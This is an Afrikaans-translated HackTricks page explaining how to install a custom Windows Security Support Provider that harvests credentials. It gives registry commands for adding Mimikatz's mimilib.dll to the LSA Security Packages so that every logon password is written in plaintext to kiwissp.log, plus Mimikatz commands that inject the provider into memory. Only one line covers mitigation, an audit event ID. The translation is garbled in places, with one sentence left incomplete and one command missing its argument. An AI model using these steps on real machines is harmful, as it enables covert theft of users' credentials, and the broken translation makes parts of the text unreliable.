hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

2.6 KiB

Aangepaste SSP

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Aangepaste SSP

Leer wat 'n SSP (Sekuriteitsondersteuningsverskaffer) is hier.
Jy kan jou eie SSP skep om die gelogde in klarteks van die kredensiale wat gebruik word om toegang tot die masjien te verkry.

Mimilib

Jy kan die mimilib.dll binêre lêer wat deur Mimikatz voorsien word, gebruik. Dit sal binne 'n lêer alle kredensiale in klarteks log.
Plaas die dll in C:\Windows\System32\
Kry 'n lys van bestaande LSA-sekuriteitspakette:

{% code title="aanvaller@teiken" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Voeg mimilib.dll by die Lys van Sekuriteitsondersteuningsverskaffers (Security Packages) by:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

En na 'n herlaai kan alle geloofsbriewe in die teks in C:\Windows\System32\kiwissp.log gevind word.

In geheue

Jy kan dit ook direk in geheue inspuit met Mimikatz (let daarop dat dit effens onstabiel/nie werkend kan wees):

privilege::debug
misc::memssp

Dit sal nie oorleef nie herlaai.

Versagting

Gebeurtenis ID 4657 - Oudit skepping/verandering van HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages